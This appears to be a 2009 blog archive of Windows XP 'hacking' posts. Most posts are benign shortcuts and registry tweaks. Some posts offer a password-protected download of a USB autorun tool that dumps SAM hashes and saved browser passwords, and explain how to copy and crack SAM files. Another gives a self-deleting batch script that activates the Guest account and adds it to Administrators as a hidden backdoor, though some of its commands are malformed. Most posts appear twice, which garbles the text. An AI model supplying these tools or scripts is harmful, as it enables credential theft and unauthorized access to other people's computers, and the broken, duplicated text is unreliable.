The batch file basically renames the folder with name abc to abc.{21EC2020-3AEA-1069-A2DD-08002B30309D}. So instead of writing a batch file you can directly rename a folder by appending given number.
The numbers specified after the folder name is actually CLSID (Class Identifier) of folder and the number in particular used here is GUID for Control Panel. That’s why when you try to open the folder after renaming, it opens the Control Panel. Also the icon is also of Control panel. Some other similar CLSIDs that can be used are:
.{450D8FBA-AD25-11D0-98A8-0800361B1103} - My Documents
.{20D04FE0-3AEA-1069-A2D8-08002B30309D} - My Computer
.{2227A280-3AEA-1069-A2DE-08002B30309D} - Printers
.{645FF040-5081-101B-9F08-00AA002F954E} - Recycle Bin
.{FBF23B42-E3F0-101B-8488-00AA003E56F8} - Internet Explorer
.{FF393560-C2A7-11CF-BFF4-444553540000} - History
And there are many more. You can find more CLSIDs under [HKEY_CLASSES_ROOT\CLSID\], including the above specified CLSIDs.
Though the folders are not included in the search, but you can still get the details of files and folders inside it. Suppose you folder was abc and you renamed it to abc.{21EC2020-3AEA-1069-A2DD-08002B30309D}. And consider the folder is present in C drive. Go to comand prompt, at c drive and try dir command
c:\>dir
It will display all the folders in current directory including you folder with name abc.{21EC2020-3AEA-1069-A2DD-08002B30309D} not just abc. Now try
c:\>cd abc.{21EC2020-3AEA-1069-A2DD-08002B30309D}
c>\abc.{21EC2020-3AEA-1069-A2DD-08002B30309D}>dir
It will list all the files and directory present under that folder.
Showing posts with label XP hacking. Show all posts
Showing posts with label XP hacking. Show all posts
Wednesday, August 19, 2009
Use your Windows Key
The Windows logo key, located in the bottom row of most computer keyboards is a little-used treasure. Don”t ignore it. It is the shortcut anchor for the following commands:
Windows: Display the Start menu
Windows + D: Minimize or restore all windows
Windows + E: Display Windows Explorer
Windows + F: Display Search for files
Windows + Ctrl + F: Display Search for computer
Windows + F1: Display Help and Support Center
Windows + R: Display Run dialog box
Windows + break: Display System Properties dialog box
Windows + shift + M: Undo minimize all windows
Windows + L: Lock the workstation
Windows + U: Open Utility Manager
Windows + Q: Quick switching of users (Powertoys only)
Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your pc
Windows: Display the Start menu
Windows + D: Minimize or restore all windows
Windows + E: Display Windows Explorer
Windows + F: Display Search for files
Windows + Ctrl + F: Display Search for computer
Windows + F1: Display Help and Support Center
Windows + R: Display Run dialog box
Windows + break: Display System Properties dialog box
Windows + shift + M: Undo minimize all windows
Windows + L: Lock the workstation
Windows + U: Open Utility Manager
Windows + Q: Quick switching of users (Powertoys only)
Windows + Q: Hold Windows Key, then tap Q to scroll thru the different users on your pc
Labels:
XP hacking
Wednesday, August 12, 2009
Activate The Missing dll Files in XP
DLL's (dynamic link library),
It is basically a combination of executables files that can be used by Windows programs to run properly. Some time you received a sudden pop-up message
"System could not find this DLL file" for example binkw32, maxkernl.
Normally you received these types of messages when you installed any new application, computer driver program and some time due to computer mishandling. Actually some DLL files are deactivated due to new software's installation but don't worry you can reactivate these file with the help of a simple command called Regsvr32.To activate the missing dll file
go the Start
then Run and
type here "regsrv32 with missing dll file name"
for example you missed "urlmon.dll" file then you will type in Run
"regsvr32 urlmon.dll"
and press Ok button.
Your system will activate this missing file and hopefully you will not get this missing message again.
It is basically a combination of executables files that can be used by Windows programs to run properly. Some time you received a sudden pop-up message
"System could not find this DLL file" for example binkw32, maxkernl.
Normally you received these types of messages when you installed any new application, computer driver program and some time due to computer mishandling. Actually some DLL files are deactivated due to new software's installation but don't worry you can reactivate these file with the help of a simple command called Regsvr32.To activate the missing dll file
go the Start
then Run and
type here "regsrv32 with missing dll file name"
for example you missed "urlmon.dll" file then you will type in Run
"regsvr32 urlmon.dll"
and press Ok button.
Your system will activate this missing file and hopefully you will not get this missing message again.
Labels:
XP hacking
Hidden tricks of registry edit
Disable All Caps on Files and Folders
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced] Value Name: DontPrettyPath Data Type: REG_DWORD (DWORD Value) Value Data: (0 = adjust caps, 1 = show caps) Create a new DWORD value, or modify the existing value, called "DontPrettyPath" and set it to equal "1" to display the file using their original capitalization or "0" to adjust the caps. Restart Windows for the change to take effect.
Disable Low Disk Space Message
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. Create or modify: NoLowDiskSpaceChecks REG_DWORD and set the value to 1. Logoff/Reboot.
Disable Search Assistant
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState. In the right pane, look for or create a string value called: Use Search Asst set the value to: no
Disable/Turn Off System Beeps
Start/Run/Regedit
HKEY_CURRENT_USER\Control Panel\Sound In the right pane, right click "Beeps", modify, set the value to no. Exit, reboot.
Disable/Stop Error Messages When Booting
Start/Run/Regedit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows. Value Name: NoPopupsOnBoot, Data Type: REG_DWORD (DWORD Value), Value Data: (1 = disable messages). Stops the annoying Windows pop-up messages notifying you a device is not functioning when you boot-up Windows. Create a REG_DWORD value of 'NoPopupsOnBoot' in the key below (if it doesn't already exist). Set the value to '1' to disable pop-up messages from appearing.
Disable Desktop Cleanup Wizard
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Desktop\CleanupWiz. Value Name: NoRun, Data Type: REG_DWORD (DWORD Value), Value Data: (0 = enabled, 1= disable wizard). Create a new DWORD value, or modify the existing value, called 'NoRun' and edit the value according to the settings below. Exit your registry, you may need to restart or log out of Windows for the change to take effect.
Disable Auto-Run of Windows Messenger
Start/Run/Regedit
HKEY_CURRENT_USER\SOFTWARE\ MICROSOFT\WINDOWS\CURRENTVERSION\RUN. Delete the Value named MSMSGS.
Disable Auto-Expanding Trees in Windows Explorer
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Change the value of "FriendlyTree" to 0.
Disable Tool Tips
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. Modify or create, "ShowInfoTip" and set the Value to 0. To restore set the Value to 1. This edit excludes the Start Button.
Disable Status Messages During Boot, Logon, Logoff
Start/Run/Regedit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Right click in the right pane and select New, DWord value. Name the new value DisableStatusMessages. Double click the new value and set it to 1. Status messages will no longer show during boot/shutdown/logon/logoff.
Disable Balloon Tips
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. Modify or create, "EnableBalloonTips" and set the Value to 0. To restore set the Value to 1.
Disable Error Reporting
Start/Run/Regedit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting. Value: DoReport, 1 = Send Reports, 0 = Don't Send.
Disable Run Commands Specified in the Registry
Start/Run/Regedit
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer. Value Name: DisableLocalMachineRun, DisableLocalMachineRunOnce, DisableCurrentUserRun, DisableCurrentUserRunOnce. Data Type: REG_DWORD (DWORD Value), Value Data: (0 = enable run, 1 = disable run). Create a new DWORD value for each of the optional values above depending on which Run function to stop and set the value to "1" to disable. Restart Windows for change to take effect.
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced] Value Name: DontPrettyPath Data Type: REG_DWORD (DWORD Value) Value Data: (0 = adjust caps, 1 = show caps) Create a new DWORD value, or modify the existing value, called "DontPrettyPath" and set it to equal "1" to display the file using their original capitalization or "0" to adjust the caps. Restart Windows for the change to take effect.
Disable Low Disk Space Message
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. Create or modify: NoLowDiskSpaceChecks REG_DWORD and set the value to 1. Logoff/Reboot.
Disable Search Assistant
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState. In the right pane, look for or create a string value called: Use Search Asst set the value to: no
Disable/Turn Off System Beeps
Start/Run/Regedit
HKEY_CURRENT_USER\Control Panel\Sound In the right pane, right click "Beeps", modify, set the value to no. Exit, reboot.
Disable/Stop Error Messages When Booting
Start/Run/Regedit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows. Value Name: NoPopupsOnBoot, Data Type: REG_DWORD (DWORD Value), Value Data: (1 = disable messages). Stops the annoying Windows pop-up messages notifying you a device is not functioning when you boot-up Windows. Create a REG_DWORD value of 'NoPopupsOnBoot' in the key below (if it doesn't already exist). Set the value to '1' to disable pop-up messages from appearing.
Disable Desktop Cleanup Wizard
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Desktop\CleanupWiz. Value Name: NoRun, Data Type: REG_DWORD (DWORD Value), Value Data: (0 = enabled, 1= disable wizard). Create a new DWORD value, or modify the existing value, called 'NoRun' and edit the value according to the settings below. Exit your registry, you may need to restart or log out of Windows for the change to take effect.
Disable Auto-Run of Windows Messenger
Start/Run/Regedit
HKEY_CURRENT_USER\SOFTWARE\ MICROSOFT\WINDOWS\CURRENTVERSION\RUN. Delete the Value named MSMSGS.
Disable Auto-Expanding Trees in Windows Explorer
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Change the value of "FriendlyTree" to 0.
Disable Tool Tips
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. Modify or create, "ShowInfoTip" and set the Value to 0. To restore set the Value to 1. This edit excludes the Start Button.
Disable Status Messages During Boot, Logon, Logoff
Start/Run/Regedit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Right click in the right pane and select New, DWord value. Name the new value DisableStatusMessages. Double click the new value and set it to 1. Status messages will no longer show during boot/shutdown/logon/logoff.
Disable Balloon Tips
Start/Run/Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. Modify or create, "EnableBalloonTips" and set the Value to 0. To restore set the Value to 1.
Disable Error Reporting
Start/Run/Regedit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting. Value: DoReport, 1 = Send Reports, 0 = Don't Send.
Disable Run Commands Specified in the Registry
Start/Run/Regedit
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer. Value Name: DisableLocalMachineRun, DisableLocalMachineRunOnce, DisableCurrentUserRun, DisableCurrentUserRunOnce. Data Type: REG_DWORD (DWORD Value), Value Data: (0 = enable run, 1 = disable run). Create a new DWORD value for each of the optional values above depending on which Run function to stop and set the value to "1" to disable. Restart Windows for change to take effect.
Labels:
XP hacking
Automatically Close "Non Responding" program"
When an application fails to respond during shutdown a dialog box is displayed prompting the user to either end it now or to wait. Enabling the value AutoEndTasks will take care of the non-responding application without user intervention.
This is how to do it
To Implement for All Users
[Start] [Run] [Regedit]
Registry Key: HKEY_USERS\.DEFAULT\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot
To Implement for Individual Users
[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot
This is how to do it
To Implement for All Users
[Start] [Run] [Regedit]
Registry Key: HKEY_USERS\.DEFAULT\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot
To Implement for Individual Users
[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Control Panel\Desktop
Data Type: REG_SZ [String Value] // Value Name: AutoEndTasks
Modify/Create the Value Name [AutoEndTasks] according to the Value Data listed below.
Value Data: [0 = AutoEndTasks Disabled / 1 = AutoEndTasks Enabled]
Exit Registry and Reboot
Labels:
XP hacking
Remove Stored username and Passwords !
To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords
Labels:
XP hacking
Tuesday, August 4, 2009
hack the password of XP from USB
This program that takes 10 seconds to dump the SAM password hashes onto your usb, simple as just click the autorun button.
(Open folder to view files.)
It also dumps heaps more stuff, (IE passes) (Firefox Passes) etc
Just copy files to root directory on your usb (dumped files go to /documents/logfiles/
Download : http://rapidshare.com/files/143287662/USB_Hack.zip
Pass : hearthunter
(Open folder to view files.)
It also dumps heaps more stuff, (IE passes) (Firefox Passes) etc
Just copy files to root directory on your usb (dumped files go to /documents/logfiles/
Download : http://rapidshare.com/files/143287662/USB_Hack.zip
Pass : hearthunter
Labels:
XP hacking
What is SAM?
SAM file stores all the user info and passwords of all the accounts of a computer using Windows NT family OS(Windows XP, Windows server 2003,etc.).So if you can somehow get this file you can get the passwords.
How can one find passwords from the SAM file?
There are three places where this file can be cracked from:-
i) From the original file
%systemroot%/system32/config
This file is locked to all users during the windows is running,so that you can't open it while you are working in windows. (Find out how you can use this file....Google dear frnds).
ii) The system keeps a backup of this file in the
%systemroot%/repair/sam._
This file is available to all users at any time. So copy this file to any directory and crack the passwords using any good password cracker. I would tell you about one, not only coz its very popular but also that its free.(Find others urselves the net has a gr8 many of them)
John the Ripper:- Its a dictionary cracker and will crack almost 80% of times you use it(unless the system admin has a knack in complicating things.)
iii) You can use PWDUMP to directly crack the passwords from the registry.pwdump uses .DLL injection in order to use the system account to view the password hashes stored in the registry.(Try to find out more about pwdump)
How to prevent people from cracking ur SAM file?
i) Try to avoid password which are dictionary words.
ii) Try to use special characters in ur password.
iii)Try to add non-printable ascii characters to your passwords
How can one find passwords from the SAM file?
There are three places where this file can be cracked from:-
i) From the original file
%systemroot%/system32/config
This file is locked to all users during the windows is running,so that you can't open it while you are working in windows. (Find out how you can use this file....Google dear frnds).
ii) The system keeps a backup of this file in the
%systemroot%/repair/sam._
This file is available to all users at any time. So copy this file to any directory and crack the passwords using any good password cracker. I would tell you about one, not only coz its very popular but also that its free.(Find others urselves the net has a gr8 many of them)
John the Ripper:- Its a dictionary cracker and will crack almost 80% of times you use it(unless the system admin has a knack in complicating things.)
iii) You can use PWDUMP to directly crack the passwords from the registry.pwdump uses .DLL injection in order to use the system account to view the password hashes stored in the registry.(Try to find out more about pwdump)
How to prevent people from cracking ur SAM file?
i) Try to avoid password which are dictionary words.
ii) Try to use special characters in ur password.
iii)Try to add non-printable ascii characters to your passwords
Labels:
XP hacking
Hidden bluetooth in XP
Now you don't need 2 install any software for ur bluetooth device.
you don't know but u already had it in your window xp and vista
it can b used as:-
1.open d run command
2.now type 'fsquirt' without quotes
3.now just select whether u want 2 send or receive any file very easy.
Enjoy
you don't know but u already had it in your window xp and vista
it can b used as:-
1.open d run command
2.now type 'fsquirt' without quotes
3.now just select whether u want 2 send or receive any file very easy.
Enjoy
Labels:
XP hacking
Thursday, July 30, 2009
Convert a user account into an Administrator
Want to convert a user account into an Admin?
All you need to do is copy the code below, copy/paste it into Notepad and save it as User2admin.bat on your desktop.
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Double-click the file to execute or type the above-given code in Command Prompt.
All you need to do is copy the code below, copy/paste it into Notepad and save it as User2admin.bat on your desktop.
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Double-click the file to execute or type the above-given code in Command Prompt.
Labels:
XP hacking
Subscribe to:
Posts (Atom)